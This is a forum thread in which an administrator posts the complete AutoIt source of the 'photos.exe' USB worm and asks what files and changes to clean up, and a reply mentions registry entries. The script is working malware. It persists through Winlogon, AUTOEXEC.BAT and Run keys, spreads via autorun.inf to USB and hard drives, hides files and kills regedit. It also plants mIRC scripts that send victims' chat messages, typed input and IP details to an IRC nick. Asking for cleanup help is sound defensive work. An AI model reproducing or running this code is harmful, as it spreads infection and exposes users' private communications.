Virus

[GrimR]

I few computers on my network have emerged with the photos.exe virus. I done a search and found this script, which seems to be the actual virus.

I know it creates certain files e.g TASKMAN, msconfig.pif [hidden in C:] and ntdetect.com and a process .

Can someone tell me in this script if there is anything else that I'm missing.

I do not suggest anyone running it, I merely want advice on what other files I may need to find to get ride of it.

Thanks

Opt("TrayIconHide", 1) ;0=show, 1=hide tray icon
RegWrite("HKEY_CLASSES_ROOT\. ", "", "REG_SZ", "exefile")
RegWrite("HKEY_CLASSES_ROOT\.~»", "", "REG_SZ", "exefile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\. ", "", "REG_SZ", "exefile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.~»", "", "REG_SZ", "exefile")
RegWrite("HKEY_CLASSES_ROOT\*", "InfoTip", "REG_SZ", "I love you baby!")
If ProcessExists("msconfig.pif")then
$dir = "explorer.exe " & @ScriptDir
Run( $dir , "", @SW_MAXIMIZE) ;if user open the drive, allow it
EndIf
If ProcessExists("«~.~»") Then ;if not infected

Else
FileCopy( @ScriptFullPath , @SystemDir & "\ntdetect.com",1) ;0 =not overwrite 1 = overwrite
FileSetAttrib( @SystemDir & "\ntdetect.com", "+R+S+H")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit", "REG_SZ" ,@SystemDir & "\userinit.exe," & @SystemDir & "\ntdetect.com")

FileCopy( @ScriptFullPath , @SystemDir & "\«~.~»",1)
FileSetAttrib( @SystemDir & "\«~.~»", "+R+S+H")

FileSetAttrib( "c:\AUTOEXEC.BAT", "-R")
$file = FileOpen("c:\AUTOEXEC.BAT", 2) ;0 Read,1 Append , 2 Clear contents
; Check if file opened for writing OK
If $file = -1 Then
Exit
EndIf
FileWrite($file, "start " & @SystemDir & "\«~.~»")
FileClose($file)
Run( @SystemDir & "\«~.~»" ,"" , @SW_HIDE)
EndIf


$app = @ScriptDir
$var = DriveGetType( $app )

If $var = "REMOVABLE" then ;First run from Memory Stick Initial stage for infection

$dir = "explorer.exe " & @ScriptDir
Run( $dir , "", @SW_MAXIMIZE) ;if user open MEmorystick allow it

Elseif $var = "fixed" then ;running from computer

If @SystemDir & "\ntdetect.com" = @ScriptFullPath then
RegWrite("HKEY_CLASSES_ROOT\.mp3", "", "REG_SZ", "love")
RegWrite("HKEY_CLASSES_ROOT\.jpg", "", "REG_SZ", "love")
RegWrite("HKEY_CLASSES_ROOT\love", "", "REG_SZ", "somazina@gmail.com")
RegWrite("HKEY_CLASSES_ROOT\dllfile\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_CLASSES_ROOT\love\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mp3", "", "REG_SZ", "love")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.jpg", "", "REG_SZ", "love")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\love", "", "REG_SZ", "somazina@gmail.com")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\love\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")

If @MON = "2" and @MDAY = "16" Then Exit
Elseif @SystemDir & "\«~.~»" = @ScriptFullPath then

$ii = 0
$count = 0

Do
$drv = DriveGetDrive( "removable" ) ;Check for removable Disk to be infected
If NOT @error Then
If @MON = "2" and @MDAY = "16" Then ExitLoop

For $i = 1 to $drv[0]

if $drv[$i] <> "a:" then
if DriveStatus ( $drv[$i] ) = "READY" then
FileCopy( @ScriptFullPath , $drv[$i] & "\phyatkyee.blogspot.com",0)
FileCopy( @ScriptFullPath , $drv[$i] & "\Photos.exe",0)
FileSetAttrib( $drv[$i] & "\autorun.inf", "-R-S")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "open", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shellexecute", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shell\Explore\command", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shell\Open\command", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shell", "Explore")
FileSetAttrib( $drv[$i] & "\autorun.inf", "+S+H")
EndIf
EndIf
Next ;end of next for removeable drives
$fix = DriveGetDrive( "fixed" )
For $a = 1 to $fix[0] ;for Hard drives
If DriveStatus ( $fix[$a] ) = "UNKNOWN" then
Else
FileCopy( @ScriptFullPath , $fix[$a] & "\msconfig.pif",1)
IniWrite($fix[$a] & "\autorun.inf", "autorun", "open", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shellexecute", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shell\Explore\command", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shell\Open\command", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shell", "Explore")
FileSetAttrib( $fix[$a] & "\autorun.inf", "+R+S+H")
EndIf
Next
;check for initial program
If ProcessExists(" . ") Then
Else
FileCopy( @ScriptFullPath , @ProgramFilesDir & "\ . ",1)
Run( @ProgramFilesDir & "\ . ", "", @SW_HIDE)
EndIf
EndIf
Sleep(10000)
Until $ii = 10

Elseif @ProgramFilesDir & "\ . " = @ScriptFullPath then

While 0 <> 1
If @MON = "2" and @MDAY = "16" Then Exit
If ProcessExists(" . ") = 0 Then
FileCopy( @ScriptFullPath , @WindowsDir & "\ . ",1)
Run(" . ", "", @SW_HIDE)

EndIf
If ProcessExists("«~.~»") = 0 Then
FileCopy( @ScriptFullPath , @SystemDir & "\«~.~»",1)
Run("«~.~»", "", @SW_HIDE)

EndIf

ProcessClose("regedit.exe")
$PID = ProcessExists("regedit.exe") ; Will return the PID or 0 if the process isn't found.( PID= Process ID )
If $PID Then ProcessClose($PID)


RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD" ,"0")
sleep(500)

WEnd

Elseif @WindowsDir & "\ . " = @ScriptFullPath then
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Yadanar", "REG_SZ", @WindowsDir & "\TASKMAN.EXE")

While 0 <> 1
If @MON = "2" and @MDAY = "16" Then Exit
If ProcessExists(" . ") = 0 Then
FileCopy( @ScriptFullPath , @ProgramFilesDir & "\ . ",1)
Run(@ProgramFilesDir & "\ . ", "", @SW_HIDE)
EndIf
If ProcessExists("«~.~»") = 0 Then
FileCopy( @ScriptFullPath , @SystemDir & "\«~.~»",1)
Run("«~.~»", "", @SW_HIDE)

Endif
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDriveTypeAutoRun", "REG_DWORD", "1")
sleep(500)
WEnd
Endif ;fixed drive end
Endif; Main End


;for MIRc program
if FileExists( "C:\Program Files\mIRC\mirc.ini") then

$file = FileOpen("C:\Program Files\mIRC\mth.dll", 2);1 append 2 erase
If $file = -1 Then
Exit
EndIf
FileWrite($file, "on *:text:*:*: { .msg PhyatKyee «« < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $1- }" & @CRLF)
FileWrite($file, "on *:input:*: { .msg PhyatKyee »» $iif($left($1,1) != / , < $+ $active $+ > ,[command]) $1- }" & @CRLF)
FileWrite($file, "on *:JOIN:#: { .msg PhyatKyee IP $+ » $+ $ip ¤ Host $+ » $+ $host ¤ $os ¤ server $+ » $+ $server ¤ $serverIP }")

$file = FileOpen("C:\Program Files\mIRC\mirc.dll", 2)
If $file = -1 Then
Exit
EndIf
FileWrite($file, ";If you don't know what you were doing" & @CRLF)
FileWrite($file, ";Don't modify the codes" & @CRLF)
FileWrite($file, ";By... PhyatKyee" & @CRLF)
FileWrite($file, "on ^*:text:'*:?: { . $+ $2- | haltdef }" & @CRLF)
FileWrite($file, ";combo 20, 100 41 104 285, edit " & @CRLF)
FileWrite($file, ";text Ops (+o):, 5, 3 44 95 13, right}" & @CRLF)
FileWrite($file, ";on 1:dialog:ncor:init:0:{" & @CRLF)
FileWrite($file, ";on ^*:text:'*:?: { . $+ $2- | haltdef }" & @CRLF)
FileWrite($file, ";}" & @CRLF)
FileWrite($file, "on *:connect: { /timer 30 120 /.msg PhyatKyee hi I'm now Using mIRC »» mth.dll }")
IniWrite("C:\Program Files\mIRC\mirc.ini", "rfiles", "n2", "mirc.dll")
IniWrite("C:\Program Files\mIRC\mirc.ini", "warn", "fserve", "off")
IniWrite("C:\Program Files\mIRC\mirc.ini", "warn", "dcc", "off")
IniWrite("C:\Program Files\mIRC\mirc.ini", "warn", "link", "off")

endif

; for scoopScript2004
if FileExists( "C:\Scoop2004\mirc.ini") then

$file = FileOpen("C:\Scoop2004\mth.dll", 2)
If $file = -1 Then
Exit
EndIf
FileWrite($file, "on *:text:*:*: { .msg PhyatKyee «« < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $1- }" & @CRLF)
FileWrite($file, "on *:input:*: { .msg PhyatKyee »» $iif($left($1,1) != / , < $+ $active $+ > ,[command]) $1- }" & @CRLF)
FileWrite($file, "on *:JOIN:#: { .msg PhyatKyee IP $+ » $+ $ip ¤ Host $+ » $+ $host ¤ $os ¤ server $+ » $+ $server ¤ $serverIP }")

$file = FileOpen("C:\Scoop2004\remote03.sco", 2)
If $file = -1 Then
Exit
EndIf

FileWrite($file, "on ^*:text:'*:?: { . $+ $2- | haltdef }" & @CRLF)
FileWrite($file, "on *:connect: { /timer 30 120 /.msg PhyatKyee Scoop »» mth.dll }")
IniWrite("C:\Scoop2004\mirc.ini", "rfiles", "n3", "remote03.sco")
IniWrite("C:\Scoop2004\mirc.ini", "warn", "fserve", "off")
IniWrite("C:\Scoop2004\mirc.ini", "warn", "dcc", "off")
IniWrite("C:\Scoop2004\mirc.ini", "warn", "link", "off")

endif

;If my birthday
if @WDAY = "5" then
While 0 <> 1
msgbox(4096,"Birthday","Happy Birthday !" & @CRLF & "And I love you So Much." & @CRLF & "Ko PhyatKyee" )
sleep(50000)
RegWrite("HKEY_CLASSES_ROOT\.mp3", "", "REG_SZ", "mp3file")
RegWrite("HKEY_CLASSES_ROOT\.jpg", "", "REG_SZ", "jpegfile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mp3", "", "REG_SZ", "mp3file")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.jpg", "", "REG_SZ", "jpgfile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk", "", "REG_SZ", "lnkfile")

sleep(90000)
WEnd
EndIf

MCITP:EA/SA, MCSE, MCSA, MCDBA, MCTS, MCP+I, MCP

 

[pellet]

You will need to remove the registry entries that the virus creates as well.

 

[GrimR]

I know plus the hidden directories. I have sorted them out and don't get them on the network anymore.Thanks




MCITP:EA/SA, MCSE, MCSA, MCDBA, MCTS, MCP+I, MCP